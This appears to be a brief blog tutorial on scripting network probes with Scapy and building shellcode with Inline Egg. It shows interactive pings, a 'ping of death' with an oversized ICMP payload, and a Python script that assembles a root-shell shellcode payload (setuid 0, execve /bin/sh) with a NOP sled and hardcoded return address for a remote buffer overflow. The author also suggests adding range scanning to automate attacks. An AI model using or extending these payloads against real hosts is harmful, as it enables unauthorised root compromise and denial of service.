Between Scapy and Inline Egg, scripting network probes and [remote] buffer overflows has gotten much simpler. Scapy allows you to interactively craft packets and send/receive them, once you've debugged the packet construction, you can drop it to a python script for re-use. Inline Egg takes care of crafting null-less opcode segments for hijacking running processes.

Scapy comes with a slew of protocols, and handy tools like traceroute, arpcachepoison, p0f, etc. Here's an example of interactively crafting some pings:

# normal ping >>> ip = IP(dst="192.168.1.1") >>> pkt = ip/ICMP()/"0xDECAFBAD" >>> ans,unans = sr( pkt ) Begin emission: .Finished to send 1 packets. * Received 2 packets, got 1 answers, remaining 0 packets >>> ans.hexraw() 0000 08:11:27.604624 IP / ICMP 192.168.1.50 > 192.168.1.1 echo-request 0 / Raw ==> IP / ICMP 192.168.1.1 > 192.168.1.50 echo-reply 0 / Raw / Padding 0000 30 78 44 45 43 41 46 42 41 44 0xDECAFBAD # ping of death >>> pkt = ip / ICMP() / "0xDECAFBAD"*6551 >>> ans,drops = sr( pkt ) ..Begin emission: ............................

Inline Egg has a lot of power, check out this basic shellcode creation below. One just needs to parametrize this, add some range scanning, and you have a very usable automated tool.

import inlineegg.inlineegg as ie import struct import sys def stdinShellEgg(): egg = ie.InlineEgg(ie.Linuxx86Syscall) # FreeBSDx86Syscall OpenBSDx86Syscall egg.setuid(0) egg.setgid(0) egg.execve('/bin/sh',('sh')) return egg def main(): # create egg egg = stdinShellEgg() # exploit retAddr = struct.pack('<L',0xbffffc24L) toSend = "\x90"*(1024-len(egg)) toSend += egg.getCode() toSend += retAddr*20 print toSend main()